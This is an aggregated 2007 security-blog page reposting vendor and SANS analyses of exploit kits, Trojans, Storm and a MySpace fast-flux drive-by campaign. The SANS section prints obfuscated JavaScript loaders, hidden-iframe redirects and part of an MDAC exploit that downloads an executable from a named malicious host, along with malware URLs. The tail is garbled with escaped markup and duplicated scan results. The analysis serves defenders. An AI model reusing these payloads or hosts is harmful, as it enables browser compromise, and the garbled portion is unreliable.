Chris Mosby at myITforum.com

The 404 story

June 28th, 2007 by Roberto Tayag

We received reports of a kit being hosted in a website which on access redirect you to a malicious one. The site has different exploits whose ultimately would be to download the file vers.php which is in reality an executable file that Trend detects as TROJ_MURLO.AW. We have on our hands 8 files from this kit. Below are bits of information about the files. n404-0 Is an obfuscated script this is probably a test for the author because it just displays in a messagebox the deobfuscated unencrypted contents of the file n404-1.

n404-1 tries to download the file vers.php which is in reality a Win32 executable file. The file is being executed as ieupdate3r.exe. The file is a downloader that downloads a bunch of files. Trend already detects some of the files like TROJ_SPAMBOT.B, TROJ_AGENT.USE and TROJ_WOPLA.DX. The other files are detected generically as possible_nucrp-3. vers.php is currently being detected as TROJ_MURLO.AW.

n404-2 just like n404-1 but uses a different approach. It also downloads TROJ_MURLO.AW

n404-3 is a setsplice exploit being detected as EXPL_SSLICE.GEN. This file also tries to download TROJ_MURLO.AW

n404-4 we are not detecting this file but according to logs, it is related to MS bulletin MS06-006 which is a Media Player plug-in with non-IE browsers. This one also tries to download TROJ_MURLO.AW

n404-5 this is a possible Phel variant but it seems to be currently doing no harm. This one can probably be edited to attacker specification, probably for selling later in the game. This is also possible because this file is not being launched by version.php.

n404-6 This file is being detected as EXPL_TXTRANGE.A more information can be found here

n404-7 detected by Trend Micro as EXPL_IFRAMEBO.A this one still points to vers.php which is TROJ_MURLO.AW.

All the exploits above can be found within the site. However only n404-1, n404-2, n404-3 and n404-7 are directly launched when you are redirected to the malicious site.

Source: The 404 story -  TrendLabs | Malware Blog - by Trend Micro

Banzai! Trojan Goes (for) Japanese

June 28th, 2007 by Dianne Lagrimas

Lhaca, a Japanese archiving application, reportedly has a vulnerability in the way it handles decompression of files. A malware author has now jumped on this flaw and released TROJ_LHDROPPER.A.

When this software flaw is successfully exploited, the said Trojan drops and executes a backdoor detected by Trend Micro as BKDR_AGENT.AANE. As a result, malicious routines of the backdoor are exhibited on the affected system. It also drops an LZH (the extension used by the archiving application) file, which in turn, opens a blank MS PowerPoint file. The said action hides this Trojan s malicious routines.

The file name translates to Event Plan for Fiscal Year 2007.

This Trojan affects systems running Windows platforms with Japanese language pack and the archiving software installed.

This malware reinforces the trend that has threats targeting specific groups/regions, which in this case, are Japanese computer systems. This attack follows the same path as that of another Trojan detected in the wild late last month. Detected by Trend Micro as TROJ_PDROPPER.BA, it exploits a known Microsoft vulnerability and also displays a PowerPoint file that goes in the same vein as TROJ_LHDROPPER.A.

The text within the PPT translates to Status: Taiwan Situation (June 1, 2007: Support Members Debrief Session) Japan Interchange Association, Taipei Office.

TROJ_PDROPPER.BA also drops a backdoor (BKDR_EMBED.W).

As of this writing, no patches have been issued by the vendor for the flaw exploited by TROJ_LHDROPPER.A. Trend Micro strongly recommends not opening files from untrusted sources.

Source: Banzai! Trojan Goes (for) Japanese -  TrendLabs | Malware Blog - by Trend Micro

Spam from the Kernel: Full-Kernel Malware Installed by MPack

In the past few weeks, we have observed many Web sites that have been compromised to distribute browser exploits with the MPack kit. We’ve tracked many different MPack sources created with the intent of distributing different types of malicious codes. So far we’ve seen the following malware samples installed while surfing sites compromised by Mpack:

Trojan.Anserin - a Trojan that steals banking-related information
Trojan.Linkoptimizer.B - a dialer Trojan
Backdoor.IRC.Bot - an IRC bot
Infostealer.Ldpinch – a Trojan that steals account and password information
Trojan.Srizbi – a spam Trojan

These Trojans are already in our malware database but a malware that we discovered recently, Trojan.Srizbi is really interesting for some unique features. Trojan.Srizbi driver (windbg48.sys) has two main functions: hides itself using a Rootkit and sends spam, but the thing that makes it really unique is the fact that its probably the first full-kernel malware spotted in the wild.

Once the Trojan is installed, it works without any user mode payload and does everything from kernel-mode, including sending spam. The Rootkit code is not new: the malicious driver attaches itself to \FileSystem\Ntfs to hide files on the local disk and also patches an SDT table to hide registry keys in the same manner other older rootkits did before. Also, the Trojan attempts to delete %System%\Minidump log files and seems to include a special routine to uninstall competitor rootkits, such as “wincom32.sys” and “ntio256.sys”.

The most interesting code is contained in the spam routine. We know that using network functionalities directly from kernel-mode is much more complicated and we have seen many rootkit threats in the past - for example, Haxdoor, Rustock, and Peacomm - always carrying over a user-mode payload that gets injected into some Windows processes. Trojan.Srizbi seems to move a step forward by working totally in kernel-mode without the need to inject anything into user-mode. To manipulate the network connection directly in Kernel mode, it attaches NDIS and TCP/IP drivers and gets all the Ndis* and Zw* functions that it needs, which is unique to this threat. This technique also allows the Trojan to bypass firewall and sniffer tools, and to hide all its network activities.

We’ve seen the Trojan downloading a zip file from the srihopa.biz domain, which contains the following configuration files for spam:
000_data2 (mail server domains)
001_ncommall (list of names)
002_senderna (list of possible sender names)
003_sendersu (list of possible sender surnames)
config (main spam configuration file)
message (HTML message to spam)
mlist (recipients mail addresses)
mxdata (MX record data)

We think this sample is still in a “beta” stage and it’s not finished yet but users can still find some evidence of the infection by searching for the following registry entry (not hidden):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RcpApi\"MachineNum" = "[SIX RANDOM DIGITS-SIX RANDOM DIGITS-TWO RANDOM DIGITS]"

We guess that the author of Trojan.Srizbi could be the same as Rustock's because the polymorphic code used in Trojan.Srizbi is very similar to the Backdoor.Rustock.B packer, but more advanced.

As my colleague Elia mentioned previously, we'll undoubtedly see new versions of this malware again.

Posted by Kaoru Hayashi on July 7, 2007 07:11 PM

Source: Symantec Security Response Weblog: Spam from the Kernel: Full-Kernel Malware Installed by MPack

Analyst's Diary

 

A green grin

Costin
June 28, 2007 | 09:58  GMT

comment

Earlier today we intercepted a number of mailings with a new Warezov downloader. The good news is that it's already detected as Email-Worm.Win32.Warezov.pk, which we added to our database two days ago.

What's interesting about the mails is that along with the usual exeuctable (which in this case is called "access.exe") the messages have a couple of PDFs attached.

The PDFs, which are otherwise harmless, contain alleged financial transactions. Here's an example:

If you get tricked by these and get to run the executable, it will contact kitinjderunhadsun.com and download another executable from there. This second exe is 91095 bytes in size, and we detect it as Email-Worm.Win32.Warezov.iq.

We detected the first version of Warezov almost one year ago and after all this time, the gang behind these worms is still roaming free. I'm really looking forward to the day they get caught.

Source: Viruslist.com - Analyst's Diary

Zero Day Threats: Part 3.5 (addendum to part 3)

Wednesday June 27, 2007 at 6:31 pm CST
Posted by Craig Schmugar

Trackback

This is just a quick update to clarify a couple points and respond to some comments / posts I’ve read on the matter.

First off, the definition:

The public availability of exploit information on the same day that a vulnerability is publicly disclosed.

So what’s wrong with this definition?  Well, someone can exploit an unknown and unpatched vulnerability to attack someone else, without any public disclosure or even knowledge.  This is true.  Of course, without being aware of the details (or even existence) one could not validate and label the threat as a zero day.  But after you have this information my simple definition is satisfied.  In other words, a zero day is not a zero day until it’s a zero day.

Another likely point of contention is the inclusion of the word public.  Public is included for the specific reason of dismissing vulnerabilities and exploits that are privately reported to the vendor; and without the term being included, virtually all vulnerabilities shared with anyone are zero days, including those found by the vendor themselves.

While it is not perfect, I do think it’s a good–simple–general purpose definition.

Second, the inclusion of low-risk vulnerabilities in the stats, such as those limited to local denial of service:

I didn’t make assumptions as to the motivations of those who disclosed zero day information.  If someone was out to create a headache for Microsoft by generating more work or publicity at “a bad time” they might strategically release their DoS-only exploit around Patch Tuesday.

Clearly a vulnerability that allows for arbitrary code execution is significantly more critical, and valuable, than something that is limited to DoS.  Many vulnerabilities are reported as DoS, which may potentially be exploitable (allow for remote code execution).  It can take significantly more effort to confirm code execution and, depending on the motivation of the reporter, they may not make the effort.  You have cases where some vulnerabilities may or may not be limited to DoS.

So for the sake of the blog, I did not discount any vulnerability types.  FWIW here’s a breakdown of only those threats categories as remote code execution discovered/disclosed ±3 days of Patch Tuesday.

• 2005   0% (8)
• 2006 41% (40)
• 2007 30% (10) as of April 15

As I stated in my previous post, the dates associated with threats discovered though active exploitation are unreliable.

Third, “Exploit Wednesday”

My post really didn’t cover this.  Exploit Wednesday is less about malicious attackers sitting on exploits until the day after Patch Tuesday, and more a result of those who previously, and responsibly, reported a vulnerability to Microsoft and then waited until Patch Tuesday before going public.  After Microsoft releases a patch, they then disclose enough details that allow for the creation of an exploit.  Another factor is those who reverse engineer the patch to discover the vulnerability and then write, and release, an exploit.

The 4th and final part of this blog series is in the works.

Source: Computer Security Research - McAfee Avert Labs Blog

UPDATE!  2007-06-28

MySpace Phish/Drive-by attack vector propagating Fast Flux network growth

Two primary infection vectors have been observed providing us with unique insight into the life cycle involved in propagating a fast flux service network.  The attack vectors include:

• Compromised MySpace Member profiles redirecting to phishing sites (this has been discussed here)
• SWF Flash image malicious redirection to Phishing and drive-by browser exploit attempt.

All Flash redirects were observed redirecting browsers to http://www.e44 7aa2.com    (****CAREFUL****)
( e447aa2.com is a domain currently serviced by this flux network with wildcard DNS resolution )

$ GET http://www.e44 7aa2.com

<HTML>

<HEAD>

<meta http-equiv="refresh" content="1;url=http://login.my space.cfm.fuseaction.splash.myto ken.76701a26.da3e.44a3a17b.e44 7aa2.com/da3e/index.php" />

</HEAD>

</HTML>

(The above URL is only a single example of potentially infinite permutations)

By following the above /da3e/index.php link results in a credible looking MySpace landing page (serviced in flux) with the most interesting footer element displayed below:

<!-- onRequestEnd -->
<script>window.status="Done"</script><iframe src="../.footer_01.gif" width=0 height=0></iframe>

 The IFrame rendered /.footer_01.gif (not an actual gif but instead an encoded/obfuscated JavaScript snippet)

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%6
6%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%
72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B
%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D")
);d(unescape("%08<vrkpaq-> glmF ?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%6
6%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%
72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B
%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D")
);d(unescape("%08<gocpdk-><3?vjekgj\"3?jvfku\" dke,12]pgfcgj-oma,a6a6`dcd--8rvvj ?apq\"gocpdk>"));
</SCRIPT>

 The decoded result of the above /.footer_01.gif is:

<script>window.status="Done"</script>
<iframe src="http://fafb 4c4c.com/header_03.gif" width=1 height=1></iframe>

 The IFrame rendered /header_03.gif (served in flux) results in another JavaScript encoded/obfuscated file:

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74

REMOVED

?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%

REMOVED

dcd--8rvvj ?apq\"gocpdk>"));
</SCRIPT>

 For which the decoded result of the above /header_03.gif is:

<script>window.status="Done"</script>
<iframe src="http://fafb 4c4c.com/routine.php" width=1 height=1></iframe>

Following the IFrame rendered /routine.php file results in another JavaScript encoded/obfuscated file:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Routine Session ID: ca0910cWc01bT69aeA7e3030d1f52a45</title>

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E

REMOVED

\"lpwvgp%08y\"+*pmppGgnflcj\"lmkvalwd%08< vrkpaqctch-vzgv?gr{v\"vrkpaq>"));
</SCRIPT>        

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E

REMOVED

-> glmF ?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>
</head>

<body onload="doesnotexist()">
<SCRIPT Language="JavaScript">
eval(unescape("

REMOVED

"));
</SCRIPT>
</body>
</html>

The decoded result of  /routine.php is an attempt to exploit vulnerable IE client browsers using the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014) for which Microsoft released a patch in May 2006.

<script type="text/javascript">
function handleError() {
return true;
}
window.onerror = handleError;
</script>
<script>window.status="Done"</script>
<SCRIPT language="VBScript">
If navigator.appName="Microsoft Internet Explorer" Then
If InStr(navigator.platform,"Win32") <> 0  Then
REMOVED
set obj_msxml2 = CreateObject(Obj_Name & "." & Obj_Prog)
obj_msxml2.open "GET","http://fafb 4c4c.com/session.exe",False
obj_msxml2.send
REMOVED
End If
</SCRIPT>

The successful compromise of a windows host via this exploit content results in the download of a malicious downloader stub executable (session.exe) that is then responsible for attempting to download additional malicious components necessary for integration of new compromised hosts into a fast flux service network.

The malware stub (session.exe) above attempts to download and execute the following components:

http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe
http://fcs.camgenie .com/weby7.exe

Now back to these Evil Flash File Redirects:

What follows is just a representative sampling of URLs for imageshack.us site hosted flash files which perform one simple action, an action-script based browser redirect to a fast flux service network hosted combination phishing and drive by exploit that leverages the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014).

All files are exactly the same based on same md5 and sha1 hash for all files:

MD5: 6eaf6eed47fb52a6a87da8c829c7f8a0
SHA1: dc60b0fedf54eaf055c64ae6d434b8fc18252740

Imageshack HTTP Server maintained mtime suggest a deployment time of 2007-06-05 03:56:30-0700

Decompiling a flash component results in the discovery of that terrible redirect:

$ swfdump -atp ./img527.imageshack.us/img527/3530/38023350se6.swf
[HEADER]        File version: 8
[HEADER]        File size: 98
[HEADER]        Frame rate: 120.000000
[HEADER]        Frame count: 1
[HEADER]        Movie width: 1.00
[HEADER]        Movie height: 1.00
[045]         4 FILEATTRIBUTES
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018]        31 PROTECT
[00c]        28 DOACTION
                 (   24 bytes) action: GetUrl URL:"http://www.e447 aa2.com" Label:""
                 (    0 bytes) action: End
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END 

Where in the world are Flash files like the above being hosted?

http://img116.imagesh ack.us/img116/1299/97231039qx0.swf
http://img116.imagesh ack.us/img116/1424/81562934sa1.swf
http://img116.imagesh ack.us/img116/1699/63088115dg4.swf

REMOVED >100 URLS ( You get the idea )

http://img527.imagesh ack.us/img527/9186/77432798oc4.swf
http://img527.imagesh ack.us/img527/9573/87356429cb0.swf
http://img527.imagesh ack.us/img527/9696/66658005sg8.swf
http://img527.imagesh ack.us/img527/9828/13582837lk5.swf

Several Hundred MySpace profiles were discovered injected with links to phishing, and it is easy to imagine that many more were affected.

home.myspace.com.index.cfm.fusea ction.user.mytoken.0c38outb.h5v 17lt.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.0en0r8xd.1155 34a.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.0l3ttn77.oqr hldv.com

HUNDREDS OF URLS REMOVED

home.myspace.com.index.cfm.fusea ction.user.mytoken.1wr4sm8c.lw h gvcq.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.257k51r.uhq0 1o6.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.2dd2l3w6.gcp 8tr9.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.2dp2cvwv.at6 pyss.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.304165k.xt3c gyq.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.3gcri4jk.jk33v 96.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.3kuto9a4.de0 82ak.com

Flux!  It's SO easy to miss!

This write up is not geared to address the more complex overview of what a fast flux service network is (but is forthcoming).  Essentially all URLs involved in this fast flux service network are served by compromised hosts redirecting their HTTP and DNS traffic to another upstream Mothership host. 

;; ANSWER SECTION:
at6pyss.com.            179     IN      A       206.255.81.68 [h68.81.255.206.cable.htsp.cablelynx.com]
at6pyss.com.            179     IN      A       67.161.240.98 [c-67-161-240-98.hsd1.ut.comcast.net]
at6pyss.com.            179     IN      A       67.190.48.71 [c-67-190-48-71.hsd1.co.comcast.net]
at6pyss.com.            179     IN      A       70.241.113.51 [adsl-70-241-113-51.dsl.hstntx.swbell.net]
at6pyss.com.            179     IN      A       70.250.117.30 [ppp-70-250-117-30.dsl.hstntx.swbell.net]
at6pyss.com.            179     IN      A       71.140.90.107 [ppp-71-140-90-107.dsl.frs2ca.pacbell.net]
at6pyss.com.            179     IN      A       71.146.88.77 [adsl-71-146-88-77.dsl.pltn13.sbcglobal.net]
at6pyss.com.            179     IN      A       71.146.144.141 [adsl-71-146-144-141.dsl.pltn13.sbcglobal.net]
at6pyss.com.            179     IN      A       75.31.235.68 [adsl-75-31-235-68.dsl.chcgil.sbcglobal.net]
at6pyss.com.            179     IN      A       76.80.255.40 [cpe-76-80-255-40.socal.res.rr.com]

Check back on the above DNS results, the same goes for any domains referenced above.

The concept of Flux may unfold before very your eyes.

;; AUTHORITY SECTION:
at6pyss.com.            172799  IN      NS      ns1.welcometothechallenge.hk.
at6pyss.com.            172799  IN      NS      ns1.kanjerida.hk.
at6pyss.com.            172799  IN      NS      ns1.phudisarida.hk.
at6pyss.com.            172799  IN      NS      ns1.myheroisyourslove.hk.

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

Riding out yet Another Storm Wave

Published: 2007-06-28,
Last Updated: 2007-06-28 23:33:56 UTC
by Lorna Hutcheson (Version: 2)

Sadly you won't need a surf board for this one.  Just to give you a
heads up, there is a new round of emails with malicious links that is
making its way to the inbox of many folks.  If you haven't gotten one
yet, just give it time.   Here is quick summary of what we have found. 

The subject line that we have gotten examples
of have all been identical.  You may have gotten something else.

"Subject: You've received a postcard from a family member!"


The following is an excerpt from the email body.  (WARNING:  Do NOT
FOLLOW THE LINKs below UNLESS YOU KNOW WHAT YOU ARE DOING!!)

--------
OPTION 1
--------

Click on the following Internet address or
copy & paste it into your browser's address box.

http://200.82.187 .228/?08a823e96272575cbc68911e6c36a4

--------
OPTION 2
--------

Copy & paste the ecard number in the "View Your Card" box at
http://200.82.187 .228/

Your ecard number is
08a823e96272575cbc68911e6c36a4

The ecard numbers in the URL above are variable across SPAM samples.

Several additional examples for pattern freaks :):
ee7c634591933434671c16a2e59b1
c3de8293ec6968e3ca03
8517a32e6b9ea6878b15d7703a3b01
7cd64e28cae3d7703a3b01bdad81d9b8
e8293ec6968e3ca036e47840d8e117868911e6
ca9a885b5e6291c3de8293ec6968e3
35601e5ee713076a3db57338
6e47840d8e117868911e6c3

The website has an interesting javascript that appears to have multiple ways to exploit a browser in order to compromise a system.  If javascript is enabled, then you get:

MD5 (tm.exe) = 07276fce39282fd182757d2557f9eca7  which is a downloader that gets this:

MD5 (logi.exe) = 4aa22564a0b886226d8cf14456a598ab

If javascript is disabled, then they provide you a handy link to click on to exploit yourself and you get

MD5 (ecard.exe) = 30051dc10636730e4d6402ef8e88fd04. 

Here is what a user would see:

 "We are currently testing a new browser feature. If you are not able to
view this ecard, please click here (/ecard.exe) to view in its original format."

Here is a listing of just a handful of the 10s to 100s of thousands of
infected home systems.  Every storm infected system is potentially
capable of hosting the malware and sending the SPAM, but only a few will
be used in any given SPAM run depending on how many emails they want
sent and how many web hits they're expecting. You will notice the
Country/Network diversity and the predominance of broadband providers
(data courtesy of Team Cymru)

AS    | IP              | BGP Prefix       | CC | Registry | AS Name
5603  | 194.165.121.126 | 194.165.96.0/19  | SI | ripencc  | SIOL-NET
SiOL Internet
29737 | 24.192.186.35   | 24.192.184.0/21  | US | arin     |
WOW-INTERNET - WideOpenWest
16810 | 67.62.169.71    | 67.62.0.0/16     | US | arin     | CAVTEL02 -
Cavalier Telephone
7132  | 69.219.170.133  |    | US | arin     | SBIS-AS -\u003cbr /\>AT&T Internet Svcs/Ameritech\u003cbr /\>7132  | \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://70.232.83.200\" target\u003d_blank\>70.232.83.200\u003c/a\>   | \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://70.224.0.0/11\" target\u003d_blank\>70.224.0.0/11\u003c/a\>    | US | arin     | SBIS-AS -\u003cbr /\>AT&T Internet Svcs/SBC Global\u003cbr /\>3320  | \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://84.133.236.88\" target\u003d_blank\>84.133.236.88\u003c/a\>   | \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://84.128.0.0/10\" target\u003d_blank\>84.128.0.0/10\u003c/a\>    | DE | ripencc  | DTAG\u003cbr /\>Deutsche Telekom/Dialin.net\u003cbr /\>12392 | \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://85.27.49.108\" target\u003d_blank\>85.27.49.108\u003c/a\>    | \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://85.27.48.0/22\" target\u003d_blank\>85.27.48.0/22\u003c/a\>    | BE | ripencc  | ASBRUTELE\u003cbr /\>AS/Brutele SC\u003cbr /\>21502 | \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://85.69.86.171\" target\u003d_blank\>85.69.86.171\u003c/a\>    | \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://85.69.0.0/16\" target\u003d_blank\>85.69.0.0/16\u003c/a\>     | FR | ripencc  |\u003cbr /\>ASN-NUMERICABLE/Modulonet.fr\u003cbr /\>18881 | \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://201.47.44.156\" target\u003d_blank\>201.47.44.156\u003c/a\>   | \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://201.47.32.0/19\" target\u003d_blank\>201.47.32.0/19\u003c/a\>   | BR | lacnic   | Global\u003cbr /\>Village Telecom\u003cbr /\>25515 | \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://213.140.230.102\" target\u003d_blank\>213.140.230.102\u003c/a\> | \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://213.140.224.0/19\" target\u003d_blank\>213.140.224.0/19\u003c/a\> | RU | ripencc  | CTCNET-AS\u003cbr /\>",1] ); //--> 69.208.0.0/12    | US | arin     | SBIS-AS -
AT&T Internet Svcs/Ameritech
7132  | 70.232.83.200   | 70.224.0.0/11    | US | arin     | SBIS-AS -
AT&T Internet Svcs/SBC Global
3320  | 84.133.236.88   | 84.128.0.0/10    | DE | ripencc  | DTAG
Deutsche Telekom/Dialin.net
12392 | 85.27.49.108    | 85.27.48.0/22    | BE | ripencc  | ASBRUTELE
AS/Brutele SC
21502 | 85.69.86.171    | 85.69.0.0/16     | FR | ripencc  |
ASN-NUMERICABLE/Modulonet.fr
18881 | 201.47.44.156   | 201.47.32.0/19   | BR | lacnic   | Global
Village Telecom
25515 | 213.140.230.102 | 213.140.224.0/19 | RU | ripencc  | CTCNET-AS
Joint-Stock Central Telecom.
8642  | 85.226.199.228  | 85.224.0.0/13    | SE | ripencc  | B2 B2
Bredband/bredbandsbolaget.se 8642  | \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://85.226.199.228\" target\u003d_blank\>85.226.199.228\u003c/a\>  | \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://85.224.0.0/13\" target\u003d_blank\>85.224.0.0/13\u003c/a\>    | SE | ripencc  | B2 B2\u003cbr /\>Bredband/bredbandsbolaget.se\u003cbr /\>\u003cbr /\>As you can see, detection is skimpy at this point. The key detect below\u003cbr /\>is "Tibs". (aka Storm/Nuwar/Peacomm)\u003cbr /\>\u003cbr /\>Complete scanning result of "ecard.exe", received in VirusTotal at\u003cbr /\>06.28.2007, 21:24:37 (CET).\u003cbr /\>\u003cbr /\>Antivirus Version Update Result\u003cbr /\>AhnLab-V3 2007.6.27.0 06.28.2007  no virus found\u003cbr /\>AntiVir \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://7.4.0.34\" target\u003d_blank\>7.4.0.34\u003c/a\> 06.28.2007 HEUR/Crypted\u003cbr /\>Authentium 4.93.8 06.27.2007  no virus found\u003cbr /\>Avast 4.7.997.0 06.27.2007  no virus found\u003cbr /\>AVG 7.5.0.476 06.28.2007  no virus found\u003cbr /\>BitDefender 7.2 06.28.2007  no virus found\u003cbr /\>CAT-QuickHeal 9.00 06.27.2007  no virus found\u003cbr /\>ClamAV devel-20070416 06.28.2007  no virus found\u003cbr /\>DrWeb 4.33 06.28.2007  no virus found\u003cbr /\>eSafe \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://7.0.15.0\" target\u003d_blank\>7.0.15.0\u003c/a\> 06.27.2007 Suspicious Trojan/Worm\u003cbr /\>eTrust-Vet 30.8.3747 06.28.2007  no virus found\u003cbr /\>Ewido 4.0 06.27.2007  no virus found\u003cbr /\>FileAdvisor 1 06.28.2007  no virus found\u003cbr /\>Fortinet \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://2.91.0.0\" target\u003d_blank\>2.91.0.0\u003c/a\> 06.28.2007  no virus found\u003cbr /\>F-Prot \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://4.3.2.48\" target\u003d_blank\>4.3.2.48\u003c/a\> 06.28.2007  no virus found\u003cbr /\>F-Secure 6.70.13030.0 06.28.2007 Tibs.gen118\u003cbr /\>Ikarus T3.1.1.8 06.28.2007  no virus found\u003cbr /\>Kaspersky \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://4.0.2.24\" target\u003d_blank\>",1] ); //-->

As you can see, detection is skimpy at this point. The key detect below
is "Tibs". (aka Storm/Nuwar/Peacomm/Peed)

Complete scanning result of "ecard.exe", received in VirusTotal at
06.28.2007, 21:24:37 (CET).

Antivirus Version Update Result
AhnLab-V3 2007.6.27.0 06.28.2007  no virus found
AntiVir 7.4.0.34 06.28.2007 HEUR/Crypted
Authentium 4.93.8 06.27.2007  no virus found
Avast 4.7.997.0 06.27.2007  no virus found
AVG 7.5.0.476 06.28.2007  no virus found
BitDefender 7.2 06.28.2007  no virus found
CAT-QuickHeal 9.00 06.27.2007  no virus found
ClamAV devel-20070416 06.28.2007  no virus found
DrWeb 4.33 06.28.2007  no virus found
eSafe 7.0.15.0 06.27.2007 Suspicious Trojan/Worm
eTrust-Vet 30.8.3747 06.28.2007  no virus found
Ewido 4.0 06.27.2007  no virus found
FileAdvisor 1 06.28.2007  no virus found
Fortinet 2.91.0.0 06.28.2007  no virus found
F-Prot 4.3.2.48 06.28.2007  no virus found
F-Secure 6.70.13030.0 06.28.2007 Tibs.gen118
Ikarus T3.1.1.8 06.28.2007  no virus found
Kaspersky 4.0.2.24 06.28.2007  no virus found
McAfee 5062 06.27.2007  no virus found
Microsoft 1.2701 06.28.2007  no virus found
NOD32v2 2360 06.28.2007  no virus found
Norman 5.80.02 06.27.2007 Tibs.gen118
Panda 9.0.0.4 06.28.2007 Suspicious file
Sophos 4.19.0 06.24.2007  no virus found
Sunbelt 2.2.907.0 06.27.2007 VIPRE.Suspicious
Symantec 10 06.28.2007  no virus found
TheHacker 6.1.6.140 06.28.2007  no virus found
VBA32 3.12.0.2 06.27.2007  no virus found
VirusBuster 4.3.23:9 06.27.2007  no virus found
Webwasher-Gateway 6.0.1 06.28.2007 Heuristic.Crypted 06.28.2007  no virus found\u003cbr /\>McAfee 5062 06.27.2007  no virus found\u003cbr /\>Microsoft 1.2701 06.28.2007  no virus found\u003cbr /\>NOD32v2 2360 06.28.2007  no virus found\u003cbr /\>Norman 5.80.02 06.27.2007 Tibs.gen118\u003cbr /\>Panda \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://9.0.0.4\" target\u003d_blank\>9.0.0.4\u003c/a\> 06.28.2007 Suspicious file\u003cbr /\>Sophos 4.19.0 06.24.2007  no virus found\u003cbr /\>Sunbelt 2.2.907.0 06.27.2007 VIPRE.Suspicious\u003cbr /\>Symantec 10 06.28.2007  no virus found\u003cbr /\>TheHacker \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://6.1.6.140\" target\u003d_blank\>6.1.6.140\u003c/a\> 06.28.2007  no virus found\u003cbr /\>VBA32 \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://3.12.0.2\" target\u003d_blank\>3.12.0.2\u003c/a\> 06.27.2007  no virus found\u003cbr /\>VirusBuster 4.3.23:9 06.27.2007  no virus found\u003cbr /\>Webwasher-Gateway 6.0.1 06.28.2007 Heuristic.Crypted\u003cbr /\>\u003cbr /\>Aditional Information\u003cbr /\>File size: 7915 bytes\u003cbr /\>MD5: 30051dc10636730e4d6402ef8e88fd\u003cwbr /\>04\u003cbr /\>SHA1: 05368309bf89a78d680e239f58ec39\u003cwbr 